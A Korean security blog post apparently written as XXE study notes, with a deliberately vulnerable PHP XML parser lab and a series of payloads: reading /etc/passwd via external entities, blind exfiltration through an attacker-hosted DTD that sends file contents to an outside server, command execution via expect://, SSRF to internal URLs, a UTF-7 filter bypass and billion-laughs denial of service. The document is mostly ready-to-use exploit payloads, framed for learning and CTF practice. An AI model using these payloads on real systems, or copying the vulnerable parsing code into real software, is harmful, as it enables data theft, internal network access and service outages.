Web security
WEB - XXE
진열님
2019. 8. 31. 21:32
공부하다가 XXE에 대해서 자세히 정리를 해보려고한다.
맨날 CTF 보면서 cheat sheet만 보다 보니 한번 직접 구현해 보는 게 좋겠다고 생각해서 작성해 본다.
일단 PHP에서 XML 파싱 기능이 있는 함수는 크게 입력을 파일명으로 받느냐, 텍스트로 받느냐 2가지이다. (참고: 외부 엔티티가 실제로 치환되는지는 libxml 버전과 LIBXML_NOENT 옵션 여부에 따라 달라진다. libxml2 2.9.0 이상에서는 외부 엔티티 로딩이 기본적으로 꺼져 있는 것으로 알려져 있으므로, 아래 실습이 동작하지 않으면 simplexml_load_string()의 세 번째 인자로 LIBXML_NOENT를 넘겨서 확인해 보면 된다. 실제 서비스에서는 반대로 신뢰할 수 없는 입력에 절대 이 옵션을 쓰면 안 되고, PHP 8 미만이라면 파싱 전에 libxml_disable_entity_loader(true)를 호출해야 한다.)
$변수 = simplexml_load_file(파일 지정);
$변수 = simplexml_load_string(텍스트);
아래는 공격코드 예시이며 현미니님 블로그에서 소스코드 참조하였으며 오류 생기길래 조금 수정하였다.
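<!doctype html>
<html lang="ko">
<head>
  <meta charset="utf-8">
  <title>XML Parser (XXE lab)</title>
</head>
<body>
<?php
// Deliberately vulnerable XXE practice target -- never deploy this.
// LIBXML_NOENT makes libxml substitute (and therefore fetch) external
// entities; on libxml2 >= 2.9 that is off by default, so the flag is what
// keeps the lab reproducible. The defensive fix is the opposite: never pass
// LIBXML_NOENT for untrusted input, and on PHP < 8 call
// libxml_disable_entity_loader(true) before parsing.
$doc = null;
if (isset($_POST['xml']) && $_POST['xml'] !== '') {
    $xml = $_POST['xml'];
    echo "input length : " . strlen($xml);
    echo '<br>';
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
}
?>
<h1>XML Parser</h1>
<!-- The original listing closed a <form> it never opened, so the submit
     button posted nothing; method="post" is what the PHP above reads. -->
<form method="post">
  <label for="xml">XML</label><br>
  <textarea id="xml" name="xml" rows="12" cols="100"></textarea>
  <br>
  <button type="submit">Parse</button>
</form>
<br>
<?php
// Only <testing> under the root element is reflected, so payloads must put
// the entity reference there. Escape it so this stays an XXE lab and does
// not double as a reflected-XSS one; $doc is false on a parse failure.
if ($doc instanceof SimpleXMLElement) {
    echo htmlspecialchars((string) $doc->testing, ENT_QUOTES, 'UTF-8');
}
?>
</body>
</html>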
공격 코드 예시.
<?xml version="1.0"?>
<!-- Classic in-band XXE: an external general entity pointing at a local file
     is expanded inside <testing>, which the lab page above echoes back. -->
<!DOCTYPE root [
  <!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<test><testing>&foo;</testing></test>
XXE 공격관점은 여러가지가 있다.
- LFI(Local File Include) — 정확히는 외부 엔티티로 로컬 파일 내용을 읽어 응답에 노출시키는 파일 읽기(file disclosure)이다.
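<?xml version="1.0"?>
<!-- Reads a local file through an external general entity. The original
     declared <!ELEMENT foo (#ANY)>, which is not valid DTD syntax (a content
     spec is EMPTY, ANY, a mixed group or a children group), so libxml
     should reject the internal subset and the entity is never defined.
     ANY works; the ELEMENT declaration can also simply be dropped.
     With the lab page above, which prints only $doc->testing, use
     <test><testing>&xxe;</testing></test> as the document to see output. -->
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>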
- Blind LFI (out-of-band: 파싱 결과가 응답에 보이지 않을 때 공격자 서버로 파일 내용을 빼내는 방식)
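<?xml version="1.0"?>
<!-- Out-of-band (blind) file exfiltration. The original payload referenced
     %xxe; inside an entity value in the internal subset, which the XML spec
     forbids (WFC: PEs in Internal Subset), so it never fires. The parameter
     entity has to be expanded from an external DTD served by the attacker.

     Contents of http://192.168.0.12/evil.dtd:
       <!ENTITY % all "<!ENTITY blind SYSTEM 'http://192.168.0.12/log?%xxe;'>">
       %all;

     Multi-line file contents break the URL; in PHP targets the usual
     workaround is php://filter/convert.base64-encode/resource=/etc/passwd
     as the %xxe; source. -->
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://192.168.0.12/evil.dtd">
%dtd;
]>
<foo>&blind;</foo>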
- RCE(Remote Code Execution) — expect:// 래퍼는 PECL expect 확장이 설치된 환경에서만 동작하므로 실제 타깃에서는 드물다.
[ run "uname" command]
<?xml version="1.0" encoding="ISO-8859-1"?>
<!-- Runs `uname` through the expect:// stream wrapper. This only works when
     the PECL expect extension is loaded; otherwise libxml cannot open the
     URL. The lab page above prints only $doc->testing, so with that page
     put the reference under <test><testing> instead of <creds><user>. -->
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "expect://uname">
]>
<creds>
  <user>&xxe;</user>
</creds>
- SSRF(Server Side Request Forgery)
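<?xml version="1.0"?>
<!-- SSRF: the parser fetches an internal URL on the server's behalf and
     (in-band) reflects the response. The original <!ELEMENT foo (#ANY)> is
     not valid DTD syntax and should make libxml reject the internal subset;
     ANY is the correct form. Replace internal_domain with a real host
     (underscores are not valid in DNS labels). -->
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "https://internal_domain/server-status">
]>
<foo>&xxe;</foo>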
- UTF-7
<?xml version="1.0" encoding="UTF-7"?>
<!-- Same external-entity payload, UTF-7 encoded to slip past filters that
     look for a literal DOCTYPE or ENTITY keyword. It only works when the
     parser honours the UTF-7 declaration (libxml2 relies on iconv/ICU for
     this), so treat it as a filter-bypass variant, not the default form. -->
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
- DoS (Billion Laughs, 엔티티 확장 공격)
[ Local payload ]
<?xml version="1.0"?>
<!-- "Billion laughs": nine levels of tenfold-nested entities, so the single
     reference in the body expands to 10^9 copies of "lol" (about 3 GB) and
     exhausts parser memory. Modern libxml2 caps entity expansion unless
     XML_PARSE_HUGE is set, so the parse may simply be refused instead. -->
<!DOCTYPE lolz [
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol  "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
[ Remote payload ]
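<?xml version="1.0"?>
<!-- Remote variant: the expansion bomb lives in an entity fetched from the
     attacker's server. The original body had two well-formedness errors,
     "&test" without its closing ";" and a second "<lol>" where "</lol>" was
     meant, so the parser errors out instead of fetching the payload. -->
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">
]>
<lolz><lol>3..2..1...&test;</lol></lolz>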
출처 & 좋은자료
https://hyunmini.tistory.com/66